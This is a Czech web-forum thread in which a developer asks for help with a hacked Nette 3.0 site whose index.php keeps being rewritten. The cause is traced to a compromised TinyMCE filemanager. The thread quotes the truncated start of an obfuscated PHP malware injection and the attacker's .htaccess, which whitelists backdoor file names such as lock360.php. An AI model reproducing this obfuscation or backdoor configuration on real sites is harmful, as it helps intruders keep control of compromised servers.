Virus v souboru index.php a nette aplikace verze 3.0
- iru
- Člen | 110
Zdravím,
nějakým způsobem se mi do aplikace dostává virus, který přepisuje
soubor index.php i když jsem vyměnila FTP přístup a povolila jen svoji IP
adresu.
Jedná se o něco takového: https://pawno.cz/index.php?…
Do index.php je vložen na začátek souboru tento kód:
<?php
$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$OO_0O_0O_0=$OO0__00_OO[44].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[65].$OO0__00_OO[10].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[44]
......nevypisuji celé, protože je to dlouhé a zabralo by to zbytečně moc místa....
?>
<?php
snažím se najít řešení a nevím odkud se to tam dostává, protože
když soubor smažu a nahraju správný, tak se mi tam za pár hodin objeví
znovu a teď naposledy mi to přepsalo i práva, takže ho nemůžu smazat,
o to jsem nyní požádala ze strany hostingu. Aplikace je v nette 3.0 a
našla jsem toto: https://phpfashion.com/…aktualizujte
a chtěla jsem zkusit aktualizovat. Stáhla jsem si tedy verzi 3.0 odtud https://nette.org/cs/packages, kde je
psáno, že je kompatibilní s PHP 7.1. Na mém serveru běží PHP 7.1, ale
když jsem přepsala vendor, tak na mě vyskočila hláška, že to vyžaduje
PHP 7.2 .
Můj dotaz tedy zní, zda to může pomoci a mám se snažit o tu aktualizaci,
nebo hledám na špatném místě. Máte někdo nějaké nápady?
PS: našla jsem ještě nějaké nepatřičné soubory ve složce
„filemanager“ (používám tinymce), ty jsem smazala, tam už se nic
neobjevilo, jen dochází k přepisu souboru index.php. Do administrace jsem
vyměnila také heslo.
Budu vděčná za každou pomoc. Děkuji moc.
- Michal Kumžák
- Člen | 106
Projdi si místa kde se provádí upload souboru, jestli tam něco takového máš. Můžeš tam mít i někde již něco nahráno a útočníkovi to pak stačí jen jednou začas spustit.
- iru
- Člen | 110
a toto jsem našla v .htaccess
`<FilesMatch „.(py|exe|php)$“>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch
„^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$“>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>`
a jeho práva na 444
- iru
- Člen | 110
Michal Kumžák napsal(a):
Projdi si místa kde se provádí upload souboru, jestli tam něco takového máš. Můžeš tam mít i někde již něco nahráno a útočníkovi to pak stačí jen jednou začas spustit.
našla jsem ještě něco mezi soubory js od jquery, tak snad to už pomůže… jak jsem výše psala obsah .htaccess napadeného, tak jsem hledala názvy těch podstrčeně povolených souborů
- iru
- Člen | 110
Šaman napsal(a):
iru napsal(a):
<FilesMatch „^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$“>Jestli tam máš WordPress, tak to je samo o sobě velká bezpečnostní díra. Rozhodně ho pravidelně aktualizuj.
ne wordpress tam není, já ho nepoužívám nikdy…
- Šaman
- Člen | 2658
No, že ty wp-***
soubory jsou nejspíš záležitost
WordPressu. Takže to vypadá, že jestli ho tam nemáš, tak tě napadl
nějakej vir, co si tam dělá naslepo zadní vrátka pro WP…
Edit: Aha, jestli dobře chápu, tyhle soubory jsou právě preventivně
vyňaté z Allow from all
. To už dává smysl, teda pokud bys tam
ten WP měl :)
Editoval Šaman (24. 9. 2021 18:34)
- iru
- Člen | 110
Šaman napsal(a):
No, že ty
wp-***
soubory jsou nejspíš záležitost WordPressu. Takže to vypadá, že jestli ho tam nemáš, tak tě napadl nějakej vir, co si tam dělá naslepo zadní vrátka pro WP…Edit: Aha, jestli dobře chápu, tyhle soubory jsou právě preventivně vyňaté z
Allow from all
. To už dává smysl, teda pokud bys tam ten WP měl :)
ano přesně tak… tak se mi zdá, že byl kontaminovaný filemanager, který používám pro tinyMce… protože většina souborů byla skrytá tam a po promazání se zatím zdá klid… Tak třeba když někdo bude mít podobný problém to pomůže v hledání…